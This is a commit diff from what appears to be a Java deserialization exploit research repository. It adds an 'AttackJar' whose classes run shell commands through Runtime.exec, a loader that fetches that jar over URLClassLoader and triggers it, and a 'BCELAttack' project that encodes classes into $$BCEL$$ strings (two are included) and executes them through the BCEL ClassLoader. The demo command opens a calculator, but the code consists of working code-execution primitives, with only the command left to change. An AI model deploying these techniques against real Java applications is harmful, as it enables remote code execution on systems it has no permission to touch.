update BCEL RemoteJar :)

Author: Whoopsunix

Serialization/AttackJar/pom.xml

@@ -0,0 +1,37 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>org.example</groupId>
+    <artifactId>AttackJar</artifactId>
+    <version>1.0</version>
+    <packaging>jar</packaging>
+
+    <name>AttackJar</name>
+
+    <properties>
+        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+    </properties>
+
+    <dependencies>
+
+    </dependencies>
+
+    <build>
+        <plugins>
+            <plugin>
+                <groupId>org.springframework.boot</groupId>
+                <artifactId>spring-boot-maven-plugin</artifactId>
+            </plugin>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-compiler-plugin</artifactId>
+                <version>3.8.1</version>
+                <configuration>
+                    <source>1.8</source>
+                    <target>1.8</target>
+                </configuration>
+            </plugin>
+        </plugins>
+    </build>
+</project>

Serialization/AttackJar/src/main/java/org/example/Exec.java

@@ -0,0 +1,16 @@
+package org.example;
+
+/**
+ * @author Whoopsunix
+ */
+public class Exec {
+    public Exec() {
+    }
+
+    static {
+        try {
+            Runtime.getRuntime().exec("open -a Calculator.app");
+        } catch (Exception e){
+        }
+    }
+}

Serialization/AttackJar/src/main/java/org/example/ExecArg.java

@@ -0,0 +1,23 @@
+package org.example;
+
+/**
+ * @author Whoopsunix
+ */
+public class ExecArg {
+    public ExecArg() {
+    }
+
+    public ExecArg(String cmd) {
+        try {
+            Runtime.getRuntime().exec(cmd);
+        } catch (Exception e) {
+        }
+    }
+
+    public void exec(String cmd) {
+        try {
+            Runtime.getRuntime().exec(cmd);
+        } catch (Exception e) {
+        }
+    }
+}

Serialization/AttackJar/src/main/java/org/example/Run.java

@@ -0,0 +1,37 @@
+package org.example;
+
+import java.net.URL;
+import java.net.URLClassLoader;
+
+/**
+ * @author Whoopsunix
+ */
+public class Run {
+    public static void main(String[] args) throws Exception{
+        /**
+         * 调用 static
+         */
+//        URL url = new URL("http:///127.0.0.1:1234/AttackJar-1.0.jar");
+//        URLClassLoader classLoader = new URLClassLoader(new URL[]{url});
+//        Class<?> loadedClass = classLoader.loadClass("org.example.Exec");
+//        Object object = loadedClass.newInstance();
+
+        /**
+         * 调用构造方法
+         */
+//        URL url = new URL("http:///127.0.0.1:1234/AttackJar-1.0.jar");
+//        URLClassLoader classLoader = new URLClassLoader(new URL[]{url});
+//        Class<?> loadedClass = classLoader.loadClass("org.example.ExecArg");
+//        Object object = loadedClass.getConstructor(String.class).newInstance("open -a Calculator.app");
+
+        /**
+         * 调用方法
+         */
+        URL url = new URL("http:///127.0.0.1:1234/AttackJar-1.0.jar");
+        URLClassLoader classLoader = new URLClassLoader(new URL[]{url});
+        Class<?> loadedClass = classLoader.loadClass("org.example.ExecArg");
+        Object object = loadedClass.newInstance();
+        loadedClass.getMethod("exec", String.class).invoke(object, "open -a Calculator.app");
+
+    }
+}

Serialization/BCELAttack/pom.xml

@@ -0,0 +1,25 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+  <modelVersion>4.0.0</modelVersion>
+
+  <groupId>org.example</groupId>
+  <artifactId>BCELAttack</artifactId>
+  <version>1.0-SNAPSHOT</version>
+  <packaging>jar</packaging>
+
+  <name>BCELAttack</name>
+  <url>http://maven.apache.org</url>
+
+  <properties>
+    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+  </properties>
+
+  <dependencies>
+    <dependency>
+      <groupId>junit</groupId>
+      <artifactId>junit</artifactId>
+      <version>3.8.1</version>
+      <scope>test</scope>
+    </dependency>
+  </dependencies>
+</project>

Serialization/BCELAttack/src/main/java/org/example/BCEL.java

@@ -0,0 +1,55 @@
+package org.example;
+
+import com.sun.org.apache.bcel.internal.Repository;
+import com.sun.org.apache.bcel.internal.classfile.JavaClass;
+import com.sun.org.apache.bcel.internal.classfile.Utility;
+import com.sun.org.apache.bcel.internal.util.ClassLoader;
+
+/**
+ * @author Whoopsunix
+ */
+public class BCEL {
+    public static void main(String[] args) throws Exception {
+        /**
+         * 调用 static
+         */
+        String exec = encode(Exec.class);
+        // $$BCEL$$$l$8b$I$A$A$A$A$A$A$AePMO$c2$40$U$9c$85B$a1$96$af$o$f8$adx$SL$84$Y$8f$Q$P$S$bdH$d4$88$c1$f3R7uIi$9b$d2$g$fe$91g$$j$3c$f8$D$fcQ$c6$d7J$90$e8$kv$f6$cd$9b$99$b7$bb$9f_$ef$l$A$8e$b1$a7A$85$a1$a1$8c$d5$M$w$RVU$ac$a9XW$b1$c1$90$eeHG$G$a7$M$c9zc$c0$a0t$dd$H$c1P$e8IG$5c$85$e3$a1$f0$ef$f8$d0$s$c6$e8$b9$s$b7$H$dc$97Q$3d$t$95$e0QN$e2$9eo$b5$c4$94$8f$3d$5b$b4$ce$a7$c2l3d$3a$a6$3d$8f$d6$fan$e8$9b$e2BF$9el$d4o$8e$f8$T$d7$91AV$c5$a6$8e$zl3T$5dO8$b5$p$5e$ebr$db$Mm$k$b8$7e$93$7b$9e$8e$j$ec2$94$pG$cb$e6$8eE$DL$e1$F$d2u$Y$8a$7f$H$T$f5$x$bc$k$8e$84$Z0$94$7e$a9$db$d0$J$e4$98$ae$a1Y$oX$U$95z$a3$f7OCoPD$iyP_$ea$f6$D_$3aV$7b$d9p$e3$bb$a6$98L$da$d8G$9a$fe$3aZ$J$b0$e8u$b4kT$9d$Q2$c2$d4$e1$x$d8$yn$af$d0$ae$R$82$M$KIu$3a$e9$3f$o$e4$90$t$cc$a0$b0$I8$8b$D$81$fc$h$SF$f2$F$ca$fd3$94$cbY$cce$c9$97$9a$t$g$94$V$e5d$vA$a7$9c$ie$e8$f1$3c$90$b6$Y$9fJ$df$e0$d7r$ac$g$C$A$A
+        decode(exec);
+
+        /**
+         * 调用构造方法, 传参
+         */
+//        String execArg = encode(ExecArg.class);
+//        // $$BCEL$$$l$8b$I$A$A$A$A$A$A$Am$91MO$c2$40$Q$86$df$a5$c5j$a9$96$82$e0$b7$c6$93$a0$89$8d$f1$8811$GO$f5$pb$f0$e4$a1$94M$5d$d2$PR$8a$e1$ly$e6$a2$c6$83$3f$c0$le$9c$F$o$s$d0$c3$cc$ce$3b$ef$3e3$9b$7e$ff$7c$7e$B8$c1$9e$8e$F$Uu$ac$a2$qCY$c3$9a$86u$N$h$M$Lg$o$S$e99$83R$a96$Z$d4$cb$b8$cd$ZLGD$fc$a6$l$b6x$f2$e0$b6$CR$KN$ec$b9A$d3M$84$ac$t$a2$9a$3e$8b$kC$c9$89$T$df$e6$D7$ec$G$dc$ae$P$b8w$91$f85$d2$xN$c7$7dq$ed$c0$8d$7c$bb$91$s$o$f2kr$88$e2$85mI$9ci2$e8$8d$b8$9fx$fcJH$bc1A$jK$a3$B$N$8b$g6$Nla$db$c0$Ov$Z$8aSB$7d$e0$f1n$w$e2$88$d49$db0$e4$a7$de$dbV$87$7b$v$835$95$ee$fbQ$wB$9a$a9$fb$3c$fd$xJ$95$aa3$e3$a1$zUNT$86$83y$ef$fb$t$dd$r$b1$c7$7b$bd$g$f6$91$a5$l$m$bf$M$98$7c$H$c5$r$aaN$v3$ca$d9$c3w$b0$e1$a8$adS$d4$v$83l$w$Zst2$c6$s$ca$cb$94$r$60e$Cx$o$a7B$d9$92$80$Pd$8e$de$a0$3c$beB$bd$k$92A$a5$L$s$c51$b4L$A$89$96$aaA$A$93$60y$8a$b9QO$O$b4$s$D$e4$c9$a4$9e$dc$cd$g$zU$f8$F$P$W$$$EJ$C$A$A
+//        decodeArg(execArg, "open -a Calculator.app");
+
+        /**
+         * 调用方法
+         */
+//        String execArg = encode(ExecArg.class);
+//        decodeMethod(execArg, "exec", "open -a Calculator.app");
+    }
+
+    public static String encode(Class<?> clazz) throws Exception {
+        JavaClass javaClass = Repository.lookupClass(clazz);
+        String s = Utility.encode(javaClass.getBytes(), true);
+        String bcelStr = "$$BCEL$$" + s;
+        System.out.println(bcelStr);
+        return bcelStr;
+    }
+
+    public static void decode(String s) throws Exception {
+        new ClassLoader().loadClass(s).newInstance();
+    }
+
+    public static void decodeArg(String s, String arg) throws Exception {
+//        new ClassLoader().loadClass(s).getConstructors()[1].newInstance(arg);
+        new ClassLoader().loadClass(s).getConstructor(String.class).newInstance(arg);
+    }
+
+    public static void decodeMethod(String s,String name,  String arg) throws Exception {
+        Object obj = new ClassLoader().loadClass(s).newInstance();
+        obj.getClass().getMethod(name, String.class).invoke(obj, arg);
+    }
+}

Serialization/BCELAttack/src/main/java/org/example/Exec.java

@@ -0,0 +1,16 @@
+package org.example;
+
+/**
+ * @author Whoopsunix
+ */
+public class Exec {
+    public Exec() {
+    }
+
+    static {
+        try {
+            Runtime.getRuntime().exec("open -a Calculator.app");
+        } catch (Exception e){
+        }
+    }
+}

Serialization/BCELAttack/src/main/java/org/example/ExecArg.java

@@ -0,0 +1,23 @@
+package org.example;
+
+/**
+ * @author Whoopsunix
+ */
+public class ExecArg {
+    public ExecArg() {
+    }
+
+    public ExecArg(String cmd) {
+        try {
+            Runtime.getRuntime().exec(cmd);
+        } catch (Exception e) {
+        }
+    }
+
+    public void exec(String cmd) {
+        try {
+            Runtime.getRuntime().exec(cmd);
+        } catch (Exception e) {
+        }
+    }
+}

Utils/src/main/java/org/tools/Reflections.java

@@ -0,0 +1,72 @@
+package org.tools;
+
+import sun.reflect.ReflectionFactory;
+
+import java.lang.reflect.AccessibleObject;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationTargetException;
+
+@SuppressWarnings("restriction")
+public class Reflections {
+
+    public static void setAccessible(AccessibleObject member) {
+        String versionStr = System.getProperty("java.version");
+        int javaVersion = Integer.parseInt(versionStr.split("\\.")[0]);
+        member.setAccessible(true);
+    }
+
+    public static Field getField(final Class<?> clazz, final String fieldName) {
+        Field field = null;
+        try {
+            field = clazz.getDeclaredField(fieldName);
+            setAccessible(field);
+        } catch (NoSuchFieldException ex) {
+            if (clazz.getSuperclass() != null)
+                field = getField(clazz.getSuperclass(), fieldName);
+        }
+        return field;
+    }
+
+    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
+        final Field field = getField(obj.getClass(), fieldName);
+        field.set(obj, value);
+    }
+
+    public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
+        final Field field = getField(obj.getClass(), fieldName);
+        return field.get(obj);
+    }
+
+    public static Constructor<?> getFirstCtor(final String name) throws Exception {
+        final Constructor<?> ctor = Class.forName(name).getDeclaredConstructors()[0];
+        setAccessible(ctor);
+        return ctor;
+    }
+
+    public static Constructor<?> getFirstCtor(Class clazz) throws Exception {
+        final Constructor<?> ctor = clazz.getDeclaredConstructors()[0];
+        setAccessible(ctor);
+        return ctor;
+    }
+
+    public static Object newInstance(String className, Object... args) throws Exception {
+        return getFirstCtor(className).newInstance(args);
+    }
+
+    public static <T> T createWithoutConstructor(Class<T> classToInstantiate)
+            throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
+        return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]);
+    }
+
+    @SuppressWarnings({"unchecked"})
+    public static <T> T createWithConstructor(Class<T> classToInstantiate, Class<? super T> constructorClass, Class<?>[] consArgTypes, Object[] consArgs)
+            throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
+        Constructor<? super T> objCons = constructorClass.getDeclaredConstructor(consArgTypes);
+        setAccessible(objCons);
+        Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons);
+        setAccessible(sc);
+        return (T) sc.newInstance(consArgs);
+    }
+
+}

Utils/src/main/java/org/tools/encryption/B64.java

@@ -0,0 +1,72 @@
+package org.tools.encryption;
+
+import com.sun.org.apache.bcel.internal.Repository;
+import com.sun.org.apache.bcel.internal.classfile.JavaClass;
+
+import java.io.FileInputStream;
+import java.io.InputStream;
+import java.util.Arrays;
+import java.util.Base64;
+
+/**
+ * @author Whoopsunix
+ */
+public class B64 {
+    /**
+     * JavaClass 形式 base64加密
+     */
+    public String encodeJavaClass(Class<?> cls){
+        try {
+            JavaClass javaClass = Repository.lookupClass(cls);
+            System.out.println(Arrays.toString(javaClass.getBytes()));
+            return encodeStr(javaClass.getBytes());
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+        return "";
+    }
+
+    // byte[]
+    public String encodeStr(byte[] b) {
+        try {
+            return Base64.getEncoder().encodeToString(b);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+        return "";
+    }
+
+    // file
+    public String encodeFile(String filePath) throws Exception {
+        InputStream in = new FileInputStream(filePath);
+        byte[] data = new byte[in.available()];
+        in.read(data);
+        return encodeStr(data);
+    }
+
+    /**
+     * 解密
+     */
+    // base64解密rt1
+    public String decodeStr1(String base64Str) {
+        byte[] b = Base64.getDecoder().decode(base64Str);
+        return new String(b);
+    }
+
+    // base64解密rt2
+    public String decodeStr2(String base64Str) {
+        try {
+            byte[] b = com.sun.org.apache.xml.internal.security.utils.Base64.decode(base64Str);
+            return new String(b);
+        } catch (Exception e){
+
+        }
+        return "";
+    }
+
+    // base64解密spring方法
+    public String decodeStr3(String base64Str) {
+        byte[] b = org.springframework.util.Base64Utils.decodeFromString(base64Str);
+        return new String(b);
+    }
+}